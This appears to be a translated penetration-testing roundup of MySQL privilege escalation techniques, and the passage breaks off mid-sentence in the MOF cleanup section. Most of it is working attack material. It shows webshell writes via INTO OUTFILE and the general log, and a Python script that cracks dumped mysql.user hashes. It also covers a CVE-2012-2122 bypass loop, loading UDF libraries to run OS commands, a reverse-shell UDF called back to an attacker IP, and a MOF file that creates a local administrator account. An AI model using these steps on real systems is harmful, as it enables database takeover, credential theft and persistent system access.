Title: MySQL Privilege Escalation Methods (Roundup)

MySQL Privilege Escalation Methods

1 Initial Access

1.1 Database privileges

The ways to obtain database operating privileges come down to the following:

Brute-forcing weak passwords on port 3306

sqlmap's --sql-shell mode on an existing SQL injection

Plaintext credentials in the website's database configuration file

A MySQL 1-day vulnerability (see section 1.4)

1.2 Webshell via file write

Prerequisites

The web root path is known and is writable by the OS user mysqld runs as

A high-privilege database user (the FILE privilege is what matters for writes)

secure_file_priv does not restrict the target path

mysql> show global variables like '%secure_file_priv%';
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv |       |
+------------------+-------+

Before MySQL 5.5.53 (and 5.6.34, 5.7.6) secure_file_priv was empty by default, so a user with the FILE privilege could write to any absolute path the mysqld OS user can write to.

From those releases on the default is restrictive: the RPM and DEB packages set it to a dedicated directory such as /var/lib/mysql-files (writes outside that directory fail), and a value of NULL disables INTO OUTFILE/DUMPFILE and LOAD_FILE() entirely. The variable is read-only at runtime, so it cannot be changed with SET GLOBAL; check it before trying any file write.

The specific principles have been described in detail in the article "SQL Injection Related" and will not be described here.

1.2.1 Writing a file with INTO OUTFILE

select '<?php phpinfo(); ?>' into outfile '/var/www/html/info.php';

With sqlmap the same write is:

sqlmap -u 'http://x.x.x.x/?id=x' --file-write='/path/to/shell.php' --file-dest='/var/www/html/test/shell.php'

Generally, file permissions on Linux are fairly strict, and the mysql OS user normally cannot write into the web root. On Windows, where mysqld often runs as SYSTEM or an administrator, the success rate is much higher.

1.2.2 Writing a file with LINES TERMINATED BY

Useful when the injection point does not let you control the SELECT list: the payload is appended as the line terminator of the exported row.

?id=1 limit 1 into outfile 'C:/wamp64/www/work/webshell.php' lines terminated by '<?php phpinfo(); ?>';

1.2.3 Writing a file via the general log

MySQL 5.0 and later support the general query log, and its global variables can be changed at runtime (SUPER privilege, SYSTEM_VARIABLES_ADMIN in 8.0) to get a shell.

Information

general_log is off by default. When it is on, every statement a client sends is recorded verbatim in the corresponding log file.

mysql> SHOW VARIABLES LIKE 'general%';
+------------------+---------------------------------+
| Variable_name    | Value                           |
+------------------+---------------------------------+
| general_log      | OFF                             |
| general_log_file | /var/lib/mysql/c1595d3a029a.log |
+------------------+---------------------------------+

Point general_log_file at a file inside the web root, then send a query containing the payload; the query text is written into that file and you have a shell. Note that the log path is not subject to secure_file_priv, so this works even where INTO OUTFILE is blocked.

# Switch the log on and change its location
set global general_log='ON';
set global general_log_file='/var/www/html/shell.php';

# Check the current configuration
mysql> SHOW VARIABLES LIKE 'general%';
+------------------+-----------------------------+
| Variable_name    | Value                       |
+------------------+-----------------------------+
| general_log      | ON                          |
| general_log_file | /var/www/html/shell.php     |
+------------------+-----------------------------+

# Write the payload into the log (the log headers around it are ignored by PHP)
select '<?php phpinfo(); ?>';

Warning

Although the file is written, it is created by the mysql OS user with mysqld's permissions:

-rw-rw---- 1 mysql mysql 293 Feb 19 10:29 shell.php

The web server user cannot read it, so requesting the PHP file returns an error (HTTP 500 in this test). In practice this rarely works on Linux; the success rate is higher on Windows. Afterwards restore general_log_file and general_log to their original values.

1.3 Hash cracking

Given DBA-level access through SQL injection, and if the target's port 3306 is also reachable, dump the password hashes from mysql.user, crack them offline and log in directly:

# MySQL <= 5.6
mysql> select host, user, password from mysql.user;

# MySQL >= 5.7
mysql> select host, user, authentication_string from mysql.user;

The '*'-prefixed values are unsalted mysql_native_password hashes, SHA1(SHA1(password)), so they can be looked up on online hash services or cracked with hashcat -m 300. MySQL 8.0 accounts default to caching_sha2_password (salted SHA-256, '$A$' prefix), which is far slower to crack.
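As an added example (not from the original article), here is the offline check behind that "decrypt" step, in Python, the language of the tooling (sqlmap) used elsewhere on this page. mysql_native_password stores '*' followed by the upper-case hex of SHA1(SHA1(password)), so a dump of mysql.user can be tested against a wordlist without touching the server; the other hash shapes in the dump (empty, pre-4.1, caching_sha2_password) are recognised and left alone. The rows and wordlist are constructed for the demonstration: the two '*' hashes are the well-known values for the passwords 'root' and 'password', the remaining rows are made up.

```python
import hashlib
from typing import Dict, Iterable, List, Optional, Tuple

# Constructed sample of `select host, user, authentication_string from mysql.user`.
# Not from any real server: the two '*' hashes are the well-known mysql_native_password
# values for 'root' and 'password'; the other rows exercise the edge cases.
SAMPLE_ROWS: List[Tuple[str, str, str]] = [
    ("localhost", "root", "*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B"),
    ("%", "app", "*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19"),
    ("localhost", "legacy", "5d2e19393cc5ef67"),   # 16-hex-char pre-4.1 format (constructed)
    ("localhost", "noauth", ""),                   # empty string: the account has no password
    ("localhost", "modern", "$A$005$" + "x" * 70), # caching_sha2_password shape (constructed)
]

# Constructed wordlist; a real run would stream a file such as rockyou.txt.
WORDLIST = ["123456", "root", "toor", "password", "admin"]


def mysql_native_password(password: str) -> str:
    """Hash as stored in mysql.user for mysql_native_password: '*' + upper-hex SHA1(SHA1(pw))."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def classify_hash(stored: str) -> str:
    """Identify the authentication plugin from the shape of the stored string."""
    if stored == "":
        return "empty"                    # no password: log in with -u user and no -p
    if stored.startswith("*") and len(stored) == 41:
        return "mysql_native_password"    # unsalted SHA1(SHA1()): wordlist / hashcat -m 300
    if stored.startswith("$A$"):
        return "caching_sha2_password"    # salted SHA-256, MySQL 8.0 default: slow to crack
    if len(stored) == 16:
        return "pre-4.1"                  # old_password() format, a different algorithm
    return "unknown"


def crack_rows(rows: Iterable[Tuple[str, str, str]],
               wordlist: Iterable[str]) -> Dict[Tuple[str, str], Tuple[str, Optional[str]]]:
    """Map (host, user) -> (hash type, recovered password or None)."""
    # The hash is unsalted, so hash the wordlist once and every row becomes a dict lookup.
    lookup = {mysql_native_password(w): w for w in wordlist}
    results: Dict[Tuple[str, str], Tuple[str, Optional[str]]] = {}
    for host, user, stored in rows:
        kind = classify_hash(stored)
        recovered = lookup.get(stored) if kind == "mysql_native_password" else None
        results[(host, user)] = (kind, recovered)
    return results


if __name__ == "__main__":
    for (host, user), (kind, pw) in crack_rows(SAMPLE_ROWS, WORDLIST).items():
        shown = pw if pw is not None else "<not in wordlist>"
        print(f"{user}@{host}: {kind}, password={shown}")
```

Because the hash is unsalted, the cost of a wordlist run is one double-SHA1 per candidate regardless of how many accounts were dumped, which is why hashcat -m 300 gets through large lists quickly; the same trick does not apply to '$A$' hashes, each of which carries its own salt.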

1.4 MySQL 1-day vulnerabilities

1.4.1 yaSSL buffer overflow

A buffer overflow in the yaSSL library bundled with old MySQL builds (CVE-2008-0226), triggered by a malformed SSL Hello message. Metasploit has modules for both platforms:

msf6 > use exploit/windows/mysql/mysql_yassl_hello
msf6 > use exploit/linux/mysql/mysql_yassl_hello

1.4.2 CVE-2012-2122

An authentication bypass: the result of the memcmp() that compares the password token was cast to a char, so on builds where memcmp() returns values outside -128..127 (certain glibc versions on 64-bit Linux) roughly one wrong-password attempt in 256 is accepted. MySQL 5.1.63 and 5.5.24 fixed it. Knowing a valid username, just loop the login until it succeeds:

for i in $(seq 1 1000); do mysql -uroot -pwrong -h 127.0.0.1 -P3306 -e 'select user(), version();' 2>/dev/null && break; done

Metasploit has a scanner module that performs the bypass and dumps the password hashes:

msf6 > use auxiliary/scanner/mysql/mysql_authbypass_hashdump

2 UDF privilege escalation

A User Defined Function is an extension of MySQL's built-in functions implemented in a shared library. Once loaded with CREATE FUNCTION it is called from SQL exactly like a native function such as version(). A library exporting sys_eval() or sys_exec() therefore turns database access into command execution as the OS user mysqld runs as.

2.1 Manual method

2.1.1 Dynamic link libraries

From MySQL 5.1 onward the UDF library must be placed in the directory given by @@plugin_dir (lib/plugin under the installation directory) before CREATE FUNCTION will load it; on older versions any directory in the system library search path worked.

UDF libraries shipped with sqlmap:

/path/to/sqlmap/data/udf/mysql

These libraries are stored encoded inside sqlmap to avoid antivirus false positives and cannot be used as-is; decode them with sqlmap's bundled cloak.py (for example `python3 extra/cloak/cloak.py -d -i lib_mysqludf_sys.so_`). See the article "SQL Injection Related" for details.

UDF libraries shipped with Metasploit:

/path/to/msf/embedded/framework/data/exploits/mysql

2.1.2 Locating the plugin directory

Query the following variable:

mysql> show variables like '%plugin%';
+---------------+------------------------------+
| Variable_name | Value                        |
+---------------+------------------------------+
| plugin_dir    | /usr/local/mysql/lib/plugin/ |
+---------------+------------------------------+

Tip

On Windows, if lib\plugin does not exist, an NTFS alternate data stream trick creates the directory with a file write (note the double colon before $INDEX_ALLOCATION):

select 233 into dumpfile 'C:\\PhpStudy\\PHPTutorial\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';

Tip

Finding the MySQL installation directory:

mysql> select @@basedir;
+------------------+
| @@basedir        |
+------------------+
| /usr/local/mysql |
+------------------+

2.1.3 Writing the library into plugin_dir

With a high-privilege SQL injection, a plugin directory writable by the mysql OS user and an unrestricted secure_file_priv, sqlmap can upload the library directly. GET parameters are limited in length (the hex-encoded library is tens of kilobytes), so this usually only works through a POST injection point:

sqlmap -u 'http://localhost/' --data='id=1' --file-write='/path/to/lib_mysqludf_sys_64.so' --file-dest='/usr/lib/mysql/plugin/udf.so'

Without an injection but with direct SQL access, do the same write by hand when secure_file_priv permits it:

# Write the library as a hex literal; DUMPFILE writes the bytes unmodified, OUTFILE would escape them
SELECT 0x7f454c4602... INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';

How to obtain the hex string? MySQL's own hex() function can encode a file that is readable by the MySQL instance you run it on (typically your own), or use `xxd -p file | tr -d '\n'`:

# Pass the path directly
SELECT hex(load_file('/lib_mysqludf_sys_64.so'));

# The path itself may also be given hex-encoded
SELECT hex(load_file(0x2f6c69625f6d7973716c7564665f7379735f36342e736f));
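As an added example, not from the original article, the write planning for sections 1.2 (secure_file_priv semantics) and 2.1.3 (hex write into plugin_dir) in Python, the language of the tooling (sqlmap) used on this page. It interprets @@secure_file_priv for the intended destination, checks the library's file magic against the target OS so an ELF is not shipped to Windows or a DLL to Linux, and emits the SELECT 0x... INTO DUMPFILE statement the article builds with hex(load_file()). Assumptions: the library bytes are constructed stand-ins (only the magic bytes are real), the prefix check mirrors MySQL's rule that files must lie under the secure_file_priv directory, forward slashes are used for Windows paths (MySQL accepts them), and the 4 MB max_allowed_packet default is MySQL 5.7's.

```python
import posixpath
from typing import Optional, Tuple

# Constructed stand-ins for a UDF library: only the file magic is real, the rest is padding.
# A real run would read lib_mysqludf_sys_64.so / lib_mysqludf_sys_64.dll from disk.
FAKE_ELF64 = b"\x7fELF\x02\x01\x01" + b"\x00" * 57   # ELF, EI_CLASS = 2 (64-bit)
FAKE_PE = b"MZ" + b"\x90" * 62                        # DOS/PE header magic


def library_kind(data: bytes) -> str:
    """Classify a candidate UDF library by its file magic."""
    if data[:4] == b"\x7fELF":
        return "ELF64" if data[4:5] == b"\x02" else "ELF32"
    if data[:2] == b"MZ":
        return "PE"
    return "unknown"


def _forward(path: str) -> str:
    """Normalise to forward slashes; MySQL accepts them on Windows too."""
    return posixpath.normpath(path.replace("\\", "/"))


def _cmp_key(path: str) -> str:
    """Comparison form: Windows drive paths are case-insensitive."""
    p = _forward(path)
    return p.lower() if len(p) > 1 and p[1] == ":" else p


def secure_file_priv_allows(value: Optional[str], dest: str) -> Tuple[bool, str]:
    """Interpret @@secure_file_priv for a proposed destination.
    None models NULL (all file import/export disabled); '' models the unrestricted
    pre-5.5.53 default; any other value is the only directory files may be written under."""
    if value is None:
        return False, "secure_file_priv is NULL: INTO OUTFILE/DUMPFILE and LOAD_FILE() are disabled"
    if value == "":
        return True, "secure_file_priv is empty: any path the mysqld OS user can write"
    base = _cmp_key(value).rstrip("/") + "/"
    if _cmp_key(dest).startswith(base):
        return True, f"destination lies under secure_file_priv ({value})"
    return False, f"destination is outside secure_file_priv ({value})"


def sql_string(s: str) -> str:
    """Quote a path as a MySQL string literal (backslash-escaped)."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def dumpfile_statement(data: bytes, dest: str) -> str:
    """SELECT 0x... INTO DUMPFILE: DUMPFILE writes the bytes unmodified, OUTFILE would escape them."""
    return f"SELECT 0x{data.hex()} INTO DUMPFILE {sql_string(dest)};"


def plan_udf_write(secure_file_priv: Optional[str], plugin_dir: str, library: bytes,
                   target_os: str, max_allowed_packet: int = 4 * 1024 * 1024) -> Tuple[bool, str]:
    """Decide whether the library can be dropped into plugin_dir; return (ok, statement or reason)."""
    kind = library_kind(library)
    wanted = "PE" if target_os == "windows" else "ELF"
    if not kind.startswith(wanted):
        return False, f"library is {kind}, target {target_os} needs {wanted}"
    name = "udf.dll" if target_os == "windows" else "udf.so"
    dest = _forward(plugin_dir).rstrip("/") + "/" + name
    ok, reason = secure_file_priv_allows(secure_file_priv, dest)
    if not ok:
        return False, reason
    stmt = dumpfile_statement(library, dest)
    # The whole statement travels in one packet, so it must fit max_allowed_packet.
    if len(stmt) > max_allowed_packet:
        return False, f"statement is {len(stmt)} bytes, exceeds max_allowed_packet ({max_allowed_packet})"
    return True, stmt


if __name__ == "__main__":
    for spv in (None, "", "/var/lib/mysql-files"):
        ok, out = plan_udf_write(spv, "/usr/lib/mysql/plugin/", FAKE_ELF64, "linux")
        print(f"secure_file_priv={spv!r}: {'OK ' + out[:40] + '...' if ok else 'refused: ' + out}")
```

The NULL / empty / directory split is the decision a practitioner makes before attempting either the webshell write of section 1.2 or the UDF drop of section 2.1.3; only the empty value (or a plugin_dir that happens to sit under the configured directory) lets the DUMPFILE route work, which is why the general-log route of section 1.2.3, whose path is not governed by secure_file_priv, is sometimes the only file write left.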

2.1.4 Command execution

The SONAME must match the file name written to plugin_dir (udf.dll on Windows, udf.so on Linux):

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';
select sys_eval('whoami');

2.1.5 Cleaning up

Remove the custom function (and delete the library from plugin_dir):

drop function sys_eval;

2.2 Automated method

Metasploit automates the upload and CREATE FUNCTION steps:

msf6 > use exploit/multi/mysql/mysql_udf_payload
msf6 exploit(multi/mysql/mysql_udf_payload) > set payload linux/x86/shell/bind_tcp

2.3 UDF shells

If MySQL cannot be reached directly (3306 filtered, or remote connections not allowed), web scripts that run on the server itself are more convenient.

2.3.1 UDF.PHP

A UDF command-execution webshell (大马, a full-featured PHP shell): https://github.com/echohun/tools/blob/master/Master/Malays/udf.php

2.3.2 Navicat MySQL

When the target MySQL does not accept external connections, upload the HTTP tunnel script that ships with Navicat (ntunnel_mysql.php) to the target website, then enable the HTTP tunnel option when creating the connection and point it at the uploaded script.

Once connected, the manual UDF privilege escalation steps above can be carried out.

2.4 Reverse shell via custom UDF

This is another UDF-based escalation, but with a purpose-built library that exposes more, and more practical, functions:

cmdshell      # Execute a cmd command
downloader    # Download a file from a URL and save it to the given directory
open3389      # Enable Terminal Services (RDP) on 3389 or a chosen port (no reboot needed if the port is unchanged)
backshell     # Reverse shell
ProcessView   # Enumerate system processes
KillProcess   # Terminate the given process
regress       # Read the registry
regwrite      # Write to the registry
shut          # Shut down, log off or reboot
about         # Description and help

Address: https://github.com/Geekby/langouster_udf

First start an nc listener on the attacking machine, write the DLL into plugin_dir on the target, and create the function:

CREATE FUNCTION backshell RETURNS STRING SONAME 'udf.dll';

Then trigger the reverse shell:

select backshell('IP', 4444);

3 MOF privilege escalation

MOF escalation is a historical technique; it basically only succeeds on Windows Server 2003 (and earlier) environments.

3.1 Principle

On those systems WMI automatically compiles any .mof file dropped into C:/Windows/system32/wbem/mof/ every few seconds. A MOF can register a permanent WMI event subscription whose ActiveScriptEventConsumer runs VBScript or JScript, and that script can launch cmd or net.exe, so the commands execute with WMI's privileges (SYSTEM). If the MySQL service account can write into that directory, arbitrary commands can be run.

3.2 Manual reproduction

3.2.1 Upload the MOF file

#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user hacker P@ssw0rd /add\")\nWSH.run(\"net.exe localgroup administrators hacker /add\")";
};

instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};

The filter fires once a minute (whenever the clock's seconds value is 5), and the consumer adds a local administrator account. Using MySQL's file-write capability, drop this MOF into C:/Windows/system32/wbem/mof/ with the same hex encoding as above (0x... stands for the hex-encoded MOF content):

select 0x... into dumpfile 'C:/windows/system32/wbem/mof/test.mof';

3.2.2 Cleaning up traces

Because every few minutes
